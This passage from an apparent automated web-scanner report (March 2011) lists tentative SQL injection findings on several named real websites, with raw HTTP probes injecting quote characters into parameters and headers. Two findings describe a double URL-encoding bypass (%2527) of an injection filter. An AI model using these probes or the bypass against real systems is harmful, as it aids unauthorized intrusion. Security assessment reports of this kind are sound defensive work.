HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62

getPubGA_onSuccess({"status":"SUCCESS","data":{"domain":[]}});

1.13. http://wd.sharethis.com/api/getApi.php [publisher parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wd.sharethis.com
Path:   /api/getApi.php

Issue detail

The publisher parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the publisher parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=null' HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 1

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 112

getPubGA_onSuccess({"status":"FAILURE","statusMessage":"Failed to load publisher domains","statusNumber":null});

Request 2

GET /api/getApi.php?return=json&cb=getPubGA_onSuccess&service=getPublisherDomains&publisher=null'' HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.cf465dc001621acac71bcb1a36056e40.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==; __uset=yes

Response 2

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 13:50:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62

getPubGA_onSuccess({"status":"SUCCESS","data":{"domain":[]}});

1.14. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:47 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQABDDDBD=KBNHGACCNMNBEBHCKOMDBKJA; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQADSABCA=GHPIEGLBDAAABDNKCNEHLBED; path=/
X-Powered-By: ASP.NET
Content-Length: 10632
Connection: keep-alive

<AdDirector><advertisement><rotationItemId>264EF1DB-A02F-46C6-803A-3AB995D15773</rotationItemId><type>GATEWAY</type><name><![CDATA[Digitas_TwixTrade_2011_JanToMarch / SpecificMedia - Mars_TwixPause_15
...[SNIP]...

1.15. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:44 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCBRBTRT=LFAIMPOBCBADPDCFICEFBEBB; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCBAADCB=KIELIOBCOLOJAGBMKGOLOPEK; path=/
X-Powered-By: ASP.NET
Content-Length: 10632
Connection: keep-alive

<AdDirector><advertisement><rotationItemId>264EF1DB-A02F-46C6-803A-3AB995D15773</rotationItemId><type>GATEWAY</type><name><![CDATA[Digitas_TwixTrade_2011_JanToMarch / SpecificMedia - Mars_TwixPause_15
...[SNIP]...

1.16. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [rotationId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web.vindicosuite.com
Path:   /Feeds/Generator/2.0/GetAdDirector.asp

Issue detail

The rotationId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rotationId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo' HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:44:54 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCASAADAC=ECKLFGCCCLOGDOBPEKJCFDLE; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: keep-alive

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

Request 2

GET /Feeds/Generator/2.0/GetAdDirector.asp?disableCap=1&rotationId=SM_Twix_InBannerVideo'' HTTP/1.1
Host: web.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://broadent.vo.llnwd.net/o2/subaccount/BroadbandEnterprises/Web/CDE/Player/RichMedia/V2_234x60/AdPlayer_6_NEW.swf?disableCap=1&rotationName=SM_Twix_InBannerVideo&debug=NO&mute=YES
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; ASPSESSIONIDAQRQQTSS=DFJNNOLBDKJPGFEBCIAFJKKI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml
Date: Sat, 19 Mar 2011 14:45:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQDTRBQR=BFDCIDBCBKDPLIFLIOGGHMLB; path=/
X-Powered-By: ASP.NET
Content-Length: 25
Connection: keep-alive

<AdDirector></AdDirector>

1.17. http://www.ultimate-guitar.com/about/job.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /about/job.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /about/job.htm' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:17 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /about/job.htm'' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:59:17 GMT
Content-Type: text/html
Connection: close
Content-Length: 49123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ULTIMATE GUITAR TABS ARCHIVE | 300,000+ Guitar Tabs, Bass Tabs, Chords and G
...[SNIP]...

1.18. http://www.ultimate-guitar.com/bands/t.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /bands/t.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bands/t.htm' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:00 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /bands/t.htm'' HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:00 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

1.19. http://www.ultimate-guitar.com/modules/rss/all_updates.xml.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /modules/rss/all_updates.xml.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /modules/rss/all_updates.xml.php?1'=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:31 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /modules/rss/all_updates.xml.php?1''=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 19 Mar 2011 13:54:31 GMT
Content-Type: text/html
Connection: close
Location: http://www.ultimate-guitar.com/modules/rss/all_updates.xml
Content-Length: 0


1.20. http://www.ultimate-guitar.com/search/suggest.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /search/suggest.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search/suggest.php%2527 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:59:20 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /search/suggest.php%2527%2527 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:59:21 GMT
Content-Type: text/html
Connection: close
Content-Length: 49123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>ULTIMATE GUITAR TABS ARCHIVE | 300,000+ Guitar Tabs, Bass Tabs, Chords and G
...[SNIP]...

1.21. http://www.ultimate-guitar.com/xtra/click_contest.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /xtra/click_contest.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xtra/click_contest.php?ug_from=main&url=http://app.ultimate-guitar.com/ugt/iphone/ HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:37 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /xtra/click_contest.php?ug_from=main&url=http://app.ultimate-guitar.com/ugt/iphone/ HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 19 Mar 2011 13:54:37 GMT
Content-Type: text/html
Connection: close
Location: http://app.ultimate-guitar.com/ugt/iphone/
Content-Length: 0


1.22. http://www.ultimate-guitar.com/xtra/click_contest.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ultimate-guitar.com
Path:   /xtra/click_contest.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /xtra/click_contest.php?1'=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 19 Mar 2011 13:54:29 GMT
Content-Type: text/html
Content-Length: 4308
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Server Busy @ Ultimate-Guitar.Com</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...
<h1>Error</h1>
...[SNIP]...

Request 2

GET /xtra/click_contest.php?1''=1 HTTP/1.1
Host: www.ultimate-guitar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Mar 2011 13:54:30 GMT
Content-Type: text/html
Connection: close
Content-Length: 0
